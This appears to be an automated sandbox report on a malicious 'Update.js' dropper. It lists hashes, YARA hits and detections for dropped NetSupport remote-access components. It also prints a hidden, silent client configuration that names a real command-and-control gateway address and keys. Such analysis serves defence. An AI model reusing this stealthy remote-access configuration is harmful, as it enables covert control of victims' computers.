                                                                                                                                                SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                                                                SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                Joe Sandbox View (related samples, same detection):
                                                                                                                                                • Filename: update.js, Detection: malicious
                                                                                                                                                • Filename: Update.js, Detection: malicious
                                                                                                                                                • Filename: update.js, Detection: malicious
                                                                                                                                                • Filename: updates.js, Detection: malicious
                                                                                                                                                • Filename: updates.js, Detection: malicious
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                                                                                                • Filename: updates.js, Detection: malicious
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                                                                                                • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                                                                                                • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24504
                                                                                                                                                Entropy (8bit):7.872865717955356
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
                                                                                                                                                MD5:B8F553FBD3DC34B58BC77A705711023D
                                                                                                                                                SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                                                                                                                                                SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                                                                                                                                                SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):195
                                                                                                                                                Entropy (8bit):4.924914741174998
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                                                                                MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                                                                                SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                                                                                SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                                                                                                SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:Generic INItialization configuration [Features]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6458
                                                                                                                                                Entropy (8bit):4.645519507940197
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                                                MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                                                SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                                                SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                                                SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):18808
                                                                                                                                                Entropy (8bit):6.292094060787929
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                                                                MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                                                                SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                                                                SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                                                                SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                Joe Sandbox View (related samples, same detection):
                                                                                                                                                • Filename: update.js, Detection: malicious
                                                                                                                                                • Filename: Update.js, Detection: malicious
                                                                                                                                                • Filename: update.js, Detection: malicious
                                                                                                                                                • Filename: updates.js, Detection: malicious
                                                                                                                                                • Filename: updates.js, Detection: malicious
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                                                                                                • Filename: updates.js, Detection: malicious
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                                                                                                • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                                                                                                • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3740024
Entropy (8bit):6.527276298837004
Encrypted:false
SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
MD5:D3D39180E85700F72AAAE25E40C125FF
SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, Author: Joe Security
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 17%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):3484
Entropy (8bit):7.953931162498908
Encrypted:false
SSDEEP:96:ZM4/EjaJuetX1hDnE9g8sxt+JOL28vWN8FdWDo8:ZMFGJpThj6g8/JOFuNodWDo8
MD5:779941310B13AC31BBA246B943B014D3
SHA1:603B7A0CE3B86E96DF1E4B73D3940C42C24EBB6F
SHA-256:DCE9CD258794C205A79F30E5E4029B4ECB32C28657A78D8FCFC41715099F0507
SHA-512:3534923A456CB85EA5C64809A9B9BF571FCCF68AAD2512B05C935D09969E01EF7EB54AA59667DE382CC6FAEFB9BDBAAF6E6FE94E235460FFF6B176913EC60173
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):78460
Entropy (8bit):7.997585601529533
Encrypted:true
SSDEEP:1536:4tXd1n3DHyLO1Xs+2DzeZ2PNkVSEilHoKmD8tQMODAGesXcZktqfESEH:6XTzS2wyZukVSEMbwI3RsXc2twESEH
MD5:918AEF560B494CC4ECF6724FBCF8A61E
SHA1:2F2B51532AEDF0936E7F8940C9F6CF356E37A3DD
SHA-256:70F0C376F0B37F4795964775DD976704D0F26B28442CF3E9694334DFE708FE8E
SHA-512:89BAB306CCF2665FA1956DCA2A77C768DF1DCA892AE16E66281BD6735D433C5467088A9C7465CA5F6CA4C56247B23B39A9ED7C7F11F079190A74FE6AF289D1DC
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):124
Entropy (8bit):6.322224310575577
Encrypted:false
SSDEEP:3:9u9FiYOI/3nWMA8gJtu+eMTb2bssqIKF2D9mO2h7N+n:Mi9I/WdPJTb2LqIEnn+n
MD5:80F10934DE31078DB583AF6C314B036F
SHA1:67B66079743AADB7C917361B4F5241F1DE078E1A
SHA-256:83A9F546EDF1056B2EFFB0221444CCFE94DF6E72D0D6E1D9540B3EC050598872
SHA-512:C117E85825A62585684E2D3FEA13AE188E25366B5B044DE9A93A246DADD3345E14088C41C63104EEEE2FDA7BE1BD50BC959E9560E0177F88DC785B10EF6BADC1
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text
Category:dropped
Size (bytes):2463
Entropy (8bit):4.467188346618147
Encrypted:false
SSDEEP:48:XZfQr+iDzuMbRmWf2/wu8I6nzsCEak0V9OTG3NOirrY:XZ473RBfiw/HzsCH9o/yY
MD5:326DDFFC1F869B14073A979C0A34D34D
SHA1:DF08E9D94AD0FAD7CC7D2D815EE7D8B82EC26E63
SHA-256:D4201EFD37AEC4552E7AA560A943B4A8D10D08AF19895E6A70991577609146FB
SHA-512:3822E64CA9CF23E50484AFCC2222594B4B2C7CD8C4E411F557ABEA851AE7CBD57F10424C0C9D8B0B6A5435D6F28F3B124C5BC457A239F0A2F0CAF433B01DA83F
Malicious:false
Preview:4dex.io/.ebaystatic.com/.widespace.com/.trafficjunky.net/.minutemedia-prebid.com/.programattik.com/.00px.net/.tsyndicate.com/.ownpage.fr/.ansira.com/.bfmio.com/.adsquare.com/.smct.io/.fengkongcloud.com/.pubwise.io/.admixer.net/.kameleoon.eu/.adelement.com/.fksnk.com/.ie8eamus.com/.aniview.com/.audrte.com/.insurads.com/.brid.tv/.polarcdn-pentos.com/.6sc.co/.ad.gt/.adskeeper.com/.cheqzone.com/.hybrid.ai/.adentifi.com/.cloud-media.fr/.justpremium.com/.refersion.com/.commander1.com/.cootlogix.com/.selectmedia.asia/.sddan.com/.a-mo.net/.2mdnsys.com/.presage.io/.2trk.info/.adnet.de/.dynata.com/.bidtheatre.com/.ufpcdn.com/.curalate.com/.digitaleast.mobi/.moatpixel.com/.yellowblue.io/.datamind.ru/.bumlam.com/.relevant-digital.com/.medialead.de/.iivt.com/.flux.jp/.adtelligent.com/.fqtag.com/.adalliance.io/.wpncdn.com/.webvisor.org/.kameleoon.io/.playwire.com/.visx.net/.gnezdo.ru/.otto.de/.socdm.com/.snigelweb.com/.powerad.ai/.kitewheel.com/.affec.tv/.basis.net/.servenobid.com/.tappx.com/.indexw
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):66
Entropy (8bit):3.99590382426697
Encrypted:false
SSDEEP:3:aeBX+4AuXEJOpKPudp:3XVAuXEs+udp
MD5:5B7BAF861A48C045D997992424B5877B
SHA1:2B2BD9A13AFE49748ABF39FAF9EB29ED658F066E
SHA-256:44071E0FCFFB9A9A32E8FA7010BB18DBC41AFD0B176F81BF700B15B638A88A51
SHA-512:4820B41AA5FF4D934A583E1F0B93B1512631102BB2DFDB74792A2F0DCF9907DA7680C02A5DDD2492A1E6D58CDADA3453D9E38BB8DEAB6CE831FF36A7F8DE016C
Malicious:false
Preview:Licensed under a separate commercial license from Disconnect, Inc.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text
Category:dropped
Size (bytes):16528
Entropy (8bit):4.551178727174085
Encrypted:false
SSDEEP:384:lMFqdq0kM55olQws9gsLW4nMFCw8oaj7CQB:lGOqPM5mlQXgeWaMFvanCs
MD5:39BDF35AC4557A2D2A4EFDEEB038723E
SHA1:9703CA8AF3432B851CB5054036DE32F8BA7B083F
SHA-256:04441A10B0B1DEEE7996E298949AC3B029BD7C24257FAF910FE14F9996BA12AE
SHA-512:732337F7B955E6ACAF1E3AAA3395BC44C80197D204BD3CBB3E201B6177AF6153CC9D7B22AD0E90B36796F92B0022806C32AC763EAEC733B234503890900BF284
Malicious:false
Preview:aboardlevel.com/.cushiondrum.com/.connectad.io/.attractionbanana.com/.klevu.com/.stripchat.com/.360.cn/.barbarousbase.com/.tailtarget.com/.spottednoise.com/.kickfire.com/.createsend24.com/.dampdock.com/.equablekettle.com/.cmail18.com/.blesspizzas.com/.p7cloud.net/.smadex.com/.responder.co.il/.condemnedcomb.com/.aquaticowl.com/.operationchicken.com/.baitbaseball.com/.cumbersomecarpenter.com/.scrapesleep.com/.clammychicken.com/.6sense.com/.unwieldyplastic.com/.sailthru.com/.gondolagnome.com/.shakysurprise.com/.impactcdn.com/.ancientact.com/.maillist-manage.in/.bushesbag.com/.rmtag.com/.mkt8628.com/.faultycanvas.com/.fewkittens.com/.createsend6.com/.cartkitten.com/.cmail12.com/.fixedfold.com/.cmail21.com/.strangeclocks.com/.lunchroomlock.com/.stimulatingsneeze.com/.conditioncrush.com/.crimsonmeadow.com/.combcompetition.com/.mkt8586.com/.motionflowers.com/.a-mx.com/.combcattle.com/.opti-digital.com/.sundaysky.com/.aliveachiever.com/.actuallything.com/.knottyswing.com/.damagedadvice.com/.ak
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):396664
Entropy (8bit):6.80911343409989
Encrypted:false
SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
MD5:2C88D947A5794CF995D2F465F1CB9D10
SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 6%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):103824
Entropy (8bit):6.674952714045651
Encrypted:false
SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
MD5:C4F1B50E3111D29774F7525039FF7086
SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 27%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):670
Entropy (8bit):5.4631538862492635
Encrypted:false
SSDEEP:12:u3xS2hz7q+j8ZGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSuMtQAfRTtEa:u3I2hzp8ZNR8pivlnxOoG1fXXfD/lQAp
MD5:15221731B8C78D255535A98220F55385
SHA1:917CBA1D62DC16241700AC2027A67B62DBD03450
SHA-256:B23705DDAF4DD0DA82EA5C70F7B406F13529B624DFCF8EC2C9099C07DE5B997D
SHA-512:0883C5B8BD9865FA31614F7C8054144323DD4FC5ACD73F7E1DEC1782B1BDB2DA7F7AF4AA9BBA76847EEE42A566C5843B2F021ACCAB477805BABAB89DB6DCCF03
Malicious:false
Preview (CRLF line breaks restored):
    0x748b6d2f
    [Client]
    _present=1
    AlwaysOnTop=1
    DisableChat=1
    DisableChatMenu=1
    DisableClientConnect=1
    DisableCloseApps=1
    DisableDisconnect=0
    DisableManageServices=0
    DisableReplayMenu=1
    DisableRequestHelp=1
    HideWhenIdle=1
    Protocols=3
    RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA
    RoomSpec=Eval
    silent=1
    SKMode=1
    SysTray=0
    UnloadMirrorOnDisconnect=1
    Usernames=*

    [_Info]
    Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini

    [_License]
    quiet=1

    [Audio]
    DisableAudioFilter=1

    [General]
    BeepUsingSpeaker=0

    [HTTP]
    GatewayAddress=5.181.159.137:443
    gskmode=0
    GSK=FH9I<H?LDJHB<A@CCHHD;K?M
    GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
Category:dropped
Size (bytes):18112
Entropy (8bit):5.982171430913221
Encrypted:false
SSDEEP:384:nPzOC+5CNMCUDCGxkKp2Z+TgNKvoUwyBDZS/1pMimimp5F9aQBb+ZIo1PCCZAhy1:niZtnLkKp2Z+TgNKvoUwqVS/L3mimp5i
MD5:7FD9CD05F23D42FB6DEDA65BD1977AC9
SHA1:DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
SHA-256:CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
SHA-512:6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
Malicious:false
Preview (truncated):<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF, LF line terminators
Category:dropped
Size (bytes):1794
Entropy (8bit):3.5509498109363986
Encrypted:false
SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
MD5:3F78A0569C858AD26452633157103095
SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
Malicious:false
Preview (truncated)://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):773968
Entropy (8bit):6.901559811406837
Encrypted:false
SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:0E37FBFA79D349D672456923EC5FBBE3
SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):328
Entropy (8bit):4.93007757242403
Encrypted:false
SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:26E28C01461F7E65C402BDF09923D435
SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:false
Preview (CRLF line breaks restored):
    ; nskbfltr.inf
    ;
    ; NS Keyboard Filter
    ;
    ;
    ; This inf file installs the WDF Framework binaries

    [Version]
    Signature="$Windows NT$"
    Provider=NSL


    ;
    ;--- nskbfltr Coinstaller installation ------
    ;


    [nskbfltr.NT.Wdf]
    KmdfService = nskbfltr, nskbfltr_wdfsect

    [nskbfltr_wdfsect]
    KmdfLibraryVersion = 1.5
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):46
Entropy (8bit):4.532048032699691
Encrypted:false
SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
MD5:3BE27483FDCDBF9EBAE93234785235E3
SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:false
Preview (CRLF line breaks restored):
    [COMMON]
    Storage_Enabled=0
    Debug_Level=0
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):9
Entropy (8bit):2.4193819456463714
Encrypted:false
SSDEEP:3:SV6:SU
MD5:72E3BED9C0F2498AE7F7B8251EB63956
SHA1:E9366F86EF5C31D2141FB5D209214D94DD1E24AF
SHA-256:96E946E3EE860C6FAF9557327EFA311AE804AA58DD58632261B16C3C567BAA5A
SHA-512:68EFACA86096F94C5FC7972F073361E4B12A3219834C0F3A6933837A35FA023A87D310B9E5AA2A8F88F9069320C60A490A24BA47219925010D69F88910C99758
Malicious:false
Preview:1.0.8.0
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):33144
Entropy (8bit):6.7376663312239256
Encrypted:false
SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
MD5:34DFB87E4200D852D1FB45DC48F93CFC
SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):63864
Entropy (8bit):6.446503462786185
Encrypted:false
SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 24%
File type: ASCII text, with very long lines (463)
Entropy (8bit): 5.097957412360465
TrID:
  File name: Update.js
